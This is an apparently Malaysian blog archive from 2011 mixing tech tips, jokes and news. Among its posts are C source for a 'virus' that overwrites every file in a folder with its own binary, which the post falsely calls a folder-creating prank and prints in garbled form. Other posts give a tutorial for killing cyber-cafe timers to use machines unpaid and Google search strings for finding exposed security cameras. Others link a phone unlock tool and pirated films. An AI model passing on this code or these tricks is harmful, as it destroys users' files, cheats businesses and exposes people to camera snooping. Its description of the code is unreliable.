Sunday, June 12, 2011

Cara Parking Yang Paling Style





4 Makanan Yang Boleh Menghilangkan Bau Badan

Bau badan merupakan masalah yang dapat menurunkan tingkat kepercayaan diri seseorang. Bau tidak sedap yang dikeluarkan dari tubuh adalah disebabkan karena banyak hal.


Namun, ada juga makanan yang dapat mencegah bau badan. Apa sajakah itu? Berikut empat makanan yang dapat memngurangkan aroma tubuh yang kurang sedap.

Salah satu faktor yang menyebabkan bau badan adalah makanan. Dikutip dari hoswtuffworks, jenis bawang-bawangan, kunyit, daging merah dan makanan pedas, merupakan makanan pemicu aroma yang tidak sedap. Untuk itu, Anda perlu mencegah makanan yang disebutkan tadi, setidaknya mengurangi makanan-makanan tersebut.

Tomato
Tomato merupakan antiseptik alami yang dapat membunuh berbagai macam bakteria, termasuk bakteria yang membuat tubuh beraroma kurang sedap. Seperti dikutip Curebum, bau badan boleh hilang dengan sering minum jus tomato. Disarankan minum jus tomato sebanyak tiga kali sehari. Jus tomato tidak hanya diminum, tapi boleh juga dicampurkan dalam bathtub, sebagai penambah ritual mandi Anda.

Teh hijau
Bau badan mungkin disebabkan oleh faktor lingkungan, seperti polusi, matahari dan debu. Bau badan karena faktor lingkungan dapat diatasi dengan bahan yang mengandung antioksidan. Antioksidan yang baik untuk mengalahkan aroma tidak sedap pada tubuh adalah teh hijau. Teh hijau juga memiliki aroma khas. Bila rajin meminumnya, maka bau segar dari teh hijau dapat keluar dari dalam tubuh.

Seledri
Seperti dikutip Foodscout, daun seledri dapat melawan bau badan. Kandungan seledri dapat melawan racun yang ada di dalam tubuh penyebab bau badan. Jadi, jangan lupa memasukkan seledri dalam makanan sehat Anda.

Jus rumput
Jenis rumput tertentu dapat dijadikan sebagai minuman. Mungkin kedengarannya aneh, tapi jus rumput sudah banyak dijual di gerai minuman yang ada di mall-mall. Dilansir dari Foodscout, khasiat jus rumput dipercaya dapat mengatasi aroma tidak sedap pada tubuh.


SUMBER

Unlock Nokie Phone Code


Korang lupa kod untuk unlock telefon korang ???

Jangan risau Admin ada cara terbaik untuk mengatasinya
Korang just download Phone Unlock Code Generator pastu masukkan nombor imei.
Senang saje kn.

Tak tahu ape itu imei. Taip *#06# untuk lihat imei code nokia handset anda :)


Download : Phone Unlock Code Generator

Tutorial Hack Masa Bermain Di Cyber Cafe



Cara untuk hack CC main tanpa had masa ni bukan la susah sangat. Tidak semua CC boleh buat hack ini kerana bukan semua CC pakai software yang sama.Hanya 80% cc saja boleh guna cara dibawah. Ok tanpa buang masa kita ke langkah2 hack cybercafe :)
Step 1.Korang buka command prompt (start>run>cmd)
Step 2.Pastu dah buka cmd korang taip cd\windows
Step 3.Pastu taip Regedit
Step 4.Oke Sekarang korang pergi cari
HKEY_CURRENT_USER>Appevents>software>classes>microsoft>windows>current
version>internet settings>policies>system
Step 5. Korang cari Disable Task manager rightclick on kan scroll bawah pastu bagi value dia 0
Step 6.Pastu korang open task manager (CTRL+ALT+DELETE)
Step 7. Korang disable Internet cafe Timer.
Settle.. Korang bleh try..
Cara Ke 2 Korang boleh juga hack pakai software contohnya GVR.. korang download kat link Admin bagi. Download Step 1. Lepas korang dah download korang extract dan install( xyah runsing ringan je software ni keh3.. ) Step 2.Pergi kat tool>kill all process ... Step 3.Pastu da ikut step 2 korang pergi semula di tool>registry repair (tunggu sampai habis repair) pastu tutup.. Mudah kan?? :)
Selamat mencuba.. !

Thursday, June 9, 2011

MATRIX BATCH FILE



Simple je nak buat matric batch file ni. Ikot je step kat bawah ni okay !

First.
open up notepad

Second.
copy The code and past it into notepad

Third.
Save as .BAT
And then Run the BAT file

Code :
@echo off
color 2
:matrix
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto matrix

:)

WINDOWS SIDEBAR GADGET MEGA PACK

Windows Sidebar Gadgets Mega Pack

OS : Windows XP, Vista, 7 | 1712 elements | 312 MB


Wednesday, June 8, 2011

Cara-cara nak tgk security camera melalui Google




Go to Google and type in one of the following:

inurl:"viewerframe?mode=motion"

intitle:"snc-rz30 home"

intitle:"WJ-NT104 Main"

inurl:LvAppl intitle:liveapplet
(^this is the one you can control^)

intitle:"Live View / - AXIS"

inurl:indexFrame.shtml


Simple je kan? cubelahh :)

Membina laman web dengan webs.com


Dengan webs.com, korang boleh buat laman web dengan. Simple sangat, just daftar then korg dah boleh edit laman web korang tu. Interface memang mudah untuk difaham.

TRY IT !

Tuesday, June 7, 2011

Battle: Los Angeles (2011) BRRip 650mb


MOVIE INFO:
http://www.imdb.com/title/tt1217613/ /

[FORMAT]:…………………..[ Matroska
[AWARDS]:…………………..[ none
[GENRE]:……………………[ Action | Sci-Fi | Thriller
[FILE SIZE]:………………..[ 650 MiB
[NO OF CDs]:………………..[ 1
[RESOLUTION]:……………….[ 1280*536
[ASPECT RATIO]:……………..[ 2.35:1
[FRAME RATE]:……………….[ 23.976 fps
[LANGUAGE ]:………………..[ English
[SUBTITLES]:………………..[ none
[ORIGINAL RUNTIME]:………….[ 01:56:00
[RELEASE RUNTIME]:…………..[ 01:56:00
[SOURCE]:…………………..[ 720pBR
[ENCODER]:………………….[scOrp
[iMDB RATING]:………………[6.0


Download

PART 1
PART 2
PART 3
PART 4

Click SKIP AD to continue :)

KISAH HANTU A DAN B

Tersebutlah kisah dua orang hantu. Mereka ni baru bertemu lalu mereka pun berborakla untuk mengisi masa lapang kehidupan mereka sebagai hantu. Sepanjang perbualan mereka, Hantu B ni tak habis-habis menggigil. Lalu, Hantu A yang kehairanan ni pun bertanya,

"Apsal kau ni asyik menggigil je?"

"Oh..cara aku mati dulu teruk..aku mati dalam peti ais...sejuk!!" Jawab Hantu B sambil menggigil lagi.

"Ooo..kesian... aku dulu mati sebab heart attack." Kata Hantu A ramah.

"Kau memang sakit jantung kronik ye? Apsal ko tak gi buat operation? Kalau tak, sure kau tengah lepak-lepak ngan family kau sekarang." Balas Hantu B.

"Dah,aku dah buat dah !In fact mase aku mati tu, aku in recovery. Panjang ceritanya..." jawab Hantu A sayu.

"Ceritala sikit..Sambil-sambil lepak nih.."

"Camni..Aku syak isteri aku main kayu tiga ngan aku. So this one day, aku ingat nak perangkap la isteri aku..Aku pura-pura gi keje tapi actually aku park keta aku kat simpang hujung umah aku je. Seperti yang aku syak, masuk sebuah keta kat carpark umah aku. Aku rilex dulu sebab nak carik mase sesuai tangkap diorang."

"So, ko dapatla tangkap diorang?" tanya Hantu B penuh minat.

"Tak. Aku cume jumpe isteri aku je kat dalam bilik. Yang aku heran, mase aku masuk umah tu, aku nampak ade kasut laki kat pintu umah aku. Aku tanye isteri aku tapi die takmo jawab. So aku pun lari-lari sekeliling umah aku nak carik jantan tuh. Abis sume bilik aku carik tapi takde pun.. Last-last, sebab aku penat sangat berlari carik jantan tuh, aku pun jatuh pengsan sebab heart attack. And aku tak sangka aku mati lak..." kata Hantu A mengakhiri ceritanya dengan kesedihan.

Hantu B terdiam mendengarkan cerita Hantu A. Selepas beberapa ketika, Hantu B berkata,

"Kenapa kau tak check kat dalam peti sejuk? Kalau kau check kat situ, sure kita berdua still hidup lagi

Toilet Mug

Agak-agak korang nak minum air gune cawan ni tak? HAHA

Sunday, June 5, 2011

YouTube Easter Egg: Play “Snake” Game While Watching a Video


Try this :)

1) Load up this YouTube video which uses the new player
2) Pause the video
3) Hold down the left arrow key on your keyboard
4) Enjoy Snake game that appears

KL HAMSTER TRAILER (PARODY)



ENJOY :)

Wednesday, June 1, 2011

Windows 7 DreamScene Activator 1.1





Download Now !

Uji kecekapan menaip.

Kepada sesiapa yang suka menaip terutama kepada orang yang selalu membuat kerja yang ada kenemengena dengan taip komputer ni.. terutama kat pejabat la.... tidak lupa juga kepada kaki blogger macam saya ni yang suka menaip untuk update blog.. memang la kene maip kalo tak, tak update la blog jawab nyerr...

anda boelh menguji kepantasan dan kecekapan anda apabila anda menaip keyboard komputer anda dengan adanya aplikasi secara online ini tidak perlu install apa2 pun.. anda cuma pergi ke laman webnya dan teruskan bermain... huhu)) pergi ke laman ini ( http://keybr.com ) dan anda boleh teruskan mencuba dan test kecekapan anda..

disitu ia akan sediakan perkataan english yang perlu anda taip.. tetapi bagi yang mahukan bahasa melayu anda boleh setting semula tetapan yang tersedia itu dengan:

1. klik pada (Random text, )

2. kemudian pilih klik (web site/blog)

3. kemudian masukkan url apa2 laman web atau blog.. sebagai contoh saya letak url laman blog bual komputer.blogspot.com..

4. selesai tetapan.. klik start..
dan sekarang anda boleh uji kepantasan anda dengan manaip perkataan bahasa melayu mengikut laman web anda letak seperti bual komputer.. bual komputer adalah entri bahasa melayu. jd terkeluarlah perkataan bahasa melayu mengikut entry dan blog :)

Edit Video Online dengan JayCut

Dengan JayCut korang boleh edit video tanpa install sebarang perisian dalam komputer anda. Senang je, just pegi laman web ni -> JayCut

ENJOY ! :)

Kongsi. Lu Lang Lu Mati !


Filem KONGSI adalah filem aksi komedi mengisahkan penyiasatan ASP Shariff terhadap kes pembunuhan di kalangan kumpulan kongsi gelap di sekitar Kuala Lumpur. Kumpulan kongsi gelap ini terdiri daripada tiga kaum iaitu Melayu, Cina dan India yang selalu bergaduh selepas berlakunya sesuatu kes pembunuhan.
ASP Shariff akhirnya berjaya mengesan seorang pembunuh upahan bernama Tumulak yang terpaksa melakukan pembunuhan untuk menebus hutangnya. Pelbagai peristiwa berlaku disebabkan perbuatan Tumulak dalam usahanya menghuru-harakan kumpulan kongsi gelap itu.

ASP Shariff yang ditugaskan membanteras pergerakan kongsi gelap ini berhadapan dengan pelbagai cabaran dalam usahanya. Dia juga diugut apabila anak dan isterinya diculik.





Ribena Mengandungi Arak?

LONDON : Pemimpin Islam di Birmingham menggesa diadakan rombakan menyeluruh dalam undang-undang pengguna selepas kemunculan berita menggemparkan bahawa dua minuman ringan kegemaran mengandungi arak.

Birmingham Post semalam melaporkan ramai peniaga membuang stok Ribena dan Lucozade selepas pengguna mendapati ramuan perisa air minuman itu mengandungi arak meskipun pada paras yang rendah. Peraturan makanan tidak mensyaratkan pengeluar produk itu, Glaxo-SmithKline menyenaraikan arak pada bungkusan minuman itu kerana kandungan arak itu pada! kadar yang rendah.

Bagaimanapun, umat Islam yang diharamkan daripada meminum arak mendakwa semua minuman ringan seharusnya dilabelkan dengan jelas jika ada ramuan yang bercampur arak meskipun amat sedikit. Empat tahun lalu, Walkers, sebuah syarikat makanan, menukar label pada bungkusan kerepeknya selepas akhbar Birmingham Post mendedahkan snek keju dan bawangnya mengandungi ekstrak lembu tidak sembelih. Kandungan arak dalam Ribena dan Lucozade adalah kurang daripada 0.1 peratus tetapi umat Islam memberitahu Birmingham Post bahawa mereka kecewa selepas mengetahui bahawa mereka sejak sekian lama meminum arak meskipun pada paras yang teramat rendah.

Pengerusi Masjid Jamik Birmingham, Dr Mohammed Naseem menyuarakan rasa terkejutnya kerana undang-undang itu masih membenarkan kandungan dalam makanan atau minuman tidak dinyatakan dengan jelas pada label.. ‘Kita amat kecewa kerana sebelum ini umat Islam menganggap minuman ringan seperti Ribena dan Lucozade ini halal tetapi sebaliknya,’ katanya.

Pekedai yang juga anggota Persatuan Peniaga Ladypool, Mohammed Zaman Khan berkata penjualan Ribena dan Lucozade jatuh mendadak sejak beberapa minggu lalu dan beliau memastikan produk itu tiada pada rak kedainya.

Jurucakap Glaxo-SmithKline memberi alasan label minuman dan makanan pasti tidak dapat dibaca jika peraturan mensyaratkan semua komponen bagi penyediaan makanan itu dinyatakan. ‘Sesetengah bahan perasa mengandungi lebih 50 komponen. Kami amat sensitif dengan keperluan budaya pengguna dan cuba menangani isu itu jika ia dimaklumkan kepada kami,’ katanya.

Beliau mengakui minuman tenaga Lucozade berperisa asli, limau, tropika dan sitrus mengandungi paras rendah arak begitu juga dengan lima perasa yang disediakan untuk Ribena.

+ SUMBER : Ribena dan Lucozade ada kandungan arak

Update (2 Mei 2010 – 5:42 AM):

Kami mendapat info yang Ribena keluaran GSK Malaysia mempunyai pengiktirafan dan pengesahan halal yang dikeluarkan Jabatan Kemajuan Islam Malaysia (Jakim). Ini bermaksud, produk Ribena yang dijual dan dikeluarkan di Malaysia adalah bebas alkohol dan selamat untuk pengguna yang beragama Islam.

Jika anda ada sebarang pertanyaan mengenai produk dan permasalahan boleh terus menghubungi talian khidmat pelanggan bebas tol di talian 1-800-88-3225 atau terus menghubungi Jabatan Komunikasi GSK Malaysia di talian 03-74912020

Tuesday, May 31, 2011

Virus CODE


This is a simple program to create a VIRUS in C:
It will create Folder in a Folder in a Folder and so on . HAHA

____________________________________________________
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)

write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
_____________________________________________________

P/S :
Run this on your own responsibility ya !

What is Google WAVE ?


Lets begin with a small description of what actually a Google wave is.

Google Wave is an online tool for real-time communication and collaboration. A wave can be both a conversation and a document where people can discuss and work together using richly formatted text, photos, videos, maps, and more.

A wave is a conversation with multiple participants — participants are people added to a wave to discuss and collaborate on its content. Participants can reply any time and anywhere within a wave, and they can edit content and add more participants as a wave develops. It’s also possible to rewind waves with the playback functionality, to see what happened, and when.

Below is the screenshot of Google wave main page after receiving an invitation and logging in.




So, If you have a gmail account or orkut account, its not enough to get a google wave account. Since google wave is a new product of google, they offer account only to limited members. Its a bit hard to get google wave account membership though it is free. There are various ways and methods to get google wave account and i am going to highlight it here.

Method 1: Sign up for Google Wave Account by filling the request form

Directly signup at google wave by sending a request to Google Wave team to get an open invitation. You need to fill a request form.

Method 2: Ask Google wave users to send you an invitation.

Remember when Gmail was introduced, a person need to get an invitation to open a gmail account. That’s the same case with Google Wave. You can ask any google wave user to send you a invitation. In this way you can easily join google wave.

Method 3: Getting Unlimited Google wave accounts



Yes, that’s right. Once you hold a google wave account, you can have unlimited google wave accounts and can invite others to google wave.

To apply this trick you will need at least One Google Wave Account and at least One Google Wave Invitation left to invite others.

First, create your entirely new mail account in Gmail.com. Then log in to your Google Wave account.

Click Invite Others to Google Wave and write your new Gmail address at Enter an Email Address Box.

Login to your new Gmail account that you’ve just created and accept the Invitation. You will be redirected to your New Google Wave Account from where you can send further more invitations.

Now u can see 8 Invitations left in your new Google Wave Account. You can keep inviting 7 people. When you have only one Invitations left follow the whole method again, i.e. create new Gmail account and invite it.


Source : http://www.allcomputertips.com/internettips/getting-google-wave-invitation-free-ways-methods-join/


ALL Windows Keyboard Shortcut


  • Shift + F10 right-clicks.

  • Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.

  • Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.

  • Win + Control + F: Open Find dialog. (Computers)

  • Win + U: Open Utility Manager.

  • Win + F1: Open Windows help.

  • Win + Pause: Open System Properties dialog.

  • Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.

  • Win + Shift + Tab: Cycle through taskbar buttons in reverse.

  • Alt + Tab: Display Cool Switch. More commonly known as the AltTab dialog.

  • Alt + Shift + Tab: Display Cool Switch; go in reverse.

  • Alt + Escape: Send active window to the bottom of the z-order.

  • Alt + Shift + Escape: Activate the window at the bottom of the z-order.

  • Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.

  • Shift while a CD is loading: Bypass AutoPlay.

  • Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)

  • Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.

  • Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.

  • Print screen: Copy screenshot of current screen to clipboard.

  • Alt + Print screen: Copy screenshot of current active window to clipboard.

  • Ctrl + Alt + Down Arrow: Invert screen. Untested on OS's other than XP.

  • Ctrl + Alt + Up Arrow: Undo inversion.

  • Win + B : Move focus to systray icons.

General

  • Ctrl + C or Ctrl + Insert: Copy.

  • Ctrl + X or Shift + Delete: Cut.

  • Ctrl + V or Shift + Insert: Paste/Move.

  • Ctrl + N: New... File, Tab, Entry, etc.

  • Ctrl + S: Save.

  • Ctrl + O: Open...

  • Ctrl + P: Print.

  • Ctrl + Z: Undo.

  • Ctrl + A: Select all.

  • Ctrl + F: Find...

  • Ctrl+W : to close the current window

  • Ctrl + F4: Close tab or child window.

  • F1: Open help.

  • F11: Toggle full screen mode.

  • Alt or F10: Activate menu bar.

  • Alt + Space: Display system menu. Same as clicking the icon on the titlebar.

  • Escape: Remove focus from current control/menu, or close dialog box.


General Navigation

  • Tab: Forward one item.

  • Shift + Tab: Backward one item.

  • Ctrl + Tab: Cycle through tabs/child windows.

  • Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.

  • Enter: If a button's selected, click it, otherwise, click default button.

  • Space: Toggle items such as radio buttons or checkboxes.

  • Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.

  • Ctrl + Left: Move cursor to the beginning of previous word.

  • Ctrl + Right: Move cursor to the beginning of next word.

  • Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in Rich Edit controls.

  • Ctrl + Down: Move cursor to beginning of next paragraph.

  • Shift + Left: Highlight one character to the left.

  • Shift + Right: Highlight one character to the right.

  • Shift + Up: Highlight from current cursor position, to one line up.

  • Shift + Down: Highlight from current cursor position, to one line down.

  • Ctrl + Shift + Left: Highlight to beginning of previous word.

  • Ctrl + Shift + Right: Highlight to beginning of next word.

  • Ctrl + Shift + Up: Highlight to beginning of previous paragraph.

  • Ctrl + Shift + Down: Highlight to beginning of next paragraph.

  • Home: Move cursor to top of a scrollable control.

  • End: Move cursor to bottom of a scrollable control.


File Browser

  • Arrow Keys: Navigate.

  • Shift + Arrow Keys: Select multiple items.

  • Ctrl + Arrow Keys: Change focus without changing selection. "Focus" is the object that will run on Enter. Space toggles selection of the focused item.

  • (Letter): Select first found item that begins with (Letter).

  • BackSpace: Go up one level to the parent directory.

  • Alt + Left: Go back one folder.

  • Alt + Right: Go forward one folder.

  • Enter: Activate (Double-click) selected item(s).

  • Alt + Enter: View properties for selected item.

  • F2: Rename selected item(s).

  • Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.

  • Delete: Delete selected item(s).

  • Shift + Delete: Delete selected item(s); bypass Recycle Bin.

  • Ctrl while dragging item(s): Copy.

  • Ctrl + Shift while dragging item(s): Create shortcut(s).

  • In tree pane, if any:

  • Left: Collapse the current selection if expanded, or select the parent folder.

  • Right: Expand the current selection if collapsed, or select the first subfolder.

  • Numpad Asterisk: Expand currently selected directory and all subdirectories. No undo.

  • Numpad Plus: Expand currently selected directory.

  • Numpad Minus: Collapse currently selected directory.


Accessibility

  • Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.

  • Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.

  • Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.

  • NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.

  • Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.

  • 6.) Microsoft Natural Keyboard with IntelliType Software Installed

  • Win + L: Log off Windows.

  • Win + P: Open Print Manager.

  • Win + C: Open control panel.

  • Win + V: Open clipboard.

  • Win + K: Open keyboard properties.

  • Win + I: Open mouse properties.

  • Win + A: Open Accessibility properties.

  • Win + Space: Displays the list of Microsoft IntelliType shortcut keys.

  • Win + S: Toggle CapsLock on and off.


Remote Desktop Connection Navigation

  • Ctrl + Alt + End: Open the NT Security dialog.

  • Alt + PageUp: Switch between programs.

  • Alt + PageDown: Switch between programs in reverse.

  • Alt + Insert: Cycle through the programs in most recently used order.

  • Alt + Home: Display start menu.

  • Ctrl + Alt + Break: Switch the client computer between a window and a full screen.

  • Alt + Delete: Display the Windows menu.

  • Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.

  • Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.


Mozilla Firefox Shortcuts

  • Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.

  • Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.

  • Ctrl + (1-9): Switch to tab corresponding to number.

  • Ctrl + N: New window.

  • Ctrl + T: New tab.

  • Ctrl + L or Alt + D or F6: Switch focus to location bar.

  • Ctrl + Enter: Open location in new tab.

  • Shift + Enter: Open location in new window.

  • Ctrl + K or Ctrl + E: Switch focus to search bar.

  • Ctrl + O: Open a local file.

  • Ctrl + W: Close tab, or window if there's only one tab open.

  • Ctrl + Shift + W: Close window.

  • Ctrl + S: Save page as a local file.

  • Ctrl + P: Print page.

  • Ctrl + F or F3: Open find toolbar.

  • Ctrl + G or F3: Find next...

  • Ctrl + Shift + G or Shift + F3: Find previous...

  • Ctrl + B or Ctrl + I: Open Bookmarks sidebar.

  • Ctrl + H: Open History sidebar.

  • Escape: Stop loading page.

  • Ctrl + R or F5: Reload current page.

  • Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.

  • Ctrl + U: View page source.

  • Ctrl + D: Bookmark current page.

  • Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.

  • Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.

  • Ctrl + Numpad0 or Ctrl + 0: Set text size to default.

  • Alt + Left or Backspace: Back.

  • Alt + Right or Shift + Backspace: Forward.

  • Alt + Home: Open home page.

  • Ctrl + M: Open new message in integrated mail client.

  • Ctrl + J: Open Downloads dialog.

  • F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.

  • Shift + F6: Switch to previous frame.

  • Apostrophe ('): Find link as you type.

  • Slash (/): Find text as you type.


Gmail Shortcuts

  • Note: Must have "keyboard shortcuts" on in settings.

  • C: Compose new message.

  • Shift + C: Open new window to compose new message.

  • Slash (/): Switch focus to search box.

  • K: Switch focus to the next most recent email. Enter or "O" opens focused email.

  • J: Switch focus to the next oldest email.

  • N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.

  • P: Switch focus to the previous message.

  • U: Takes you back to the inbox and checks for new mail.

  • Y: Various actions depending on current view:

  • Has no effect in "Sent" and "All Mail" views.

  • Inbox: Archive email or message.

  • Starred: Unstar email or message.

  • Spam: Unmark as spam and move back to "Inbox."

  • Trash: Move back to "Inbox."

  • Any label: Remove the label.

  • X: "Check" an email. Various actions can be performed against all checked emails.

  • S: "Star" an email. Identical to the more familiar term, "flagging."

  • R: Reply to the email.

  • A: Reply to all recipients of the email.

  • F: Forward an email.

  • Shift + R: Reply to the email in a new window.

  • Shift + A: Reply to all recipients of the email in a new window.

  • Shift + F: Forward an email in a new window.

  • Shift + 1 (!): Mark an email as spam and remove it from the inbox.

  • G then I: Switch to "Inbox" view.

  • G then S: Switch to "Starred" view.

  • G then A: Switch to "All Mail" view.

  • G then C: Switch to "Contacts" view.

  • G then S: Switch to "Drafts" view.


List of F1-F9 Key Commands for the Command Prompt

  • F1 / right arrow: Repeats the letters of the last command line, one by one.

  • F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line

  • F3: Repeats the last command line

  • F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line

  • F5: Goes back one command line

  • F6: Enters the traditional CTRL+Z (^z)

  • F7: Displays a menu with the command line history

  • F8: Cycles back through previous command lines (beginning with most recent)

  • F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.

  • Alt+Enter: toggle full Screen mode.

  • up/down: scroll thru/repeat previous entries

  • Esc: delete line

  • Note: The buffer allows a maximum of 50 command lines. After this number is reached, the first line will be replaced in sequence.

Helpful accessibility keyboard shortcuts

  • Switch FilterKeys on and off. Right SHIFT for eight seconds

  • Switch High Contrast on and off. Left ALT +left SHIFT +PRINT SCREEN

  • Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK

  • Switch StickyKeys on and off. SHIFT five times

  • Switch ToggleKeys on and off. NUM LOCK for five seconds

LinkWithin

Related Posts Plugin for WordPress, Blogger...